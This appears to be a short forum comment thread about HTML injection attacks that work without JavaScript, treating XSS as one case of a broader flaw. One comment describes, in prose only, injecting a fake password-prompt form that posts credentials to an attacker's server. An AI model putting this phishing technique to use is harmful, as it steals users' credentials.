If it's helpful: the "sting" of this attack is that it works even when you can't inject Javascript into the page; that's why it's referred to as an "HTML injection attack".
The canonical HTML injection attack is cross-site scripting --- it's so canonical, in fact, that we usually just think about XSS, and not the generalized flaw of HTML injection. This is an illustration of how even closing off Javascript as an attack vector doesn't stop HTML injection attacks from working.
If you get HTML/CSS control isn't that game over? If I can get HTML loaded into your Gmail tab, then I can setup a fake login or "Please re-enter your password to continue" that has a form action of myserver. (Which then just redirects you to wherever you were.)
Injecting scripting is cute because it's far more flexible, but I'd guess an HTML injection is enough to get a fairly high rate of success, albeit a bit more noticeably.
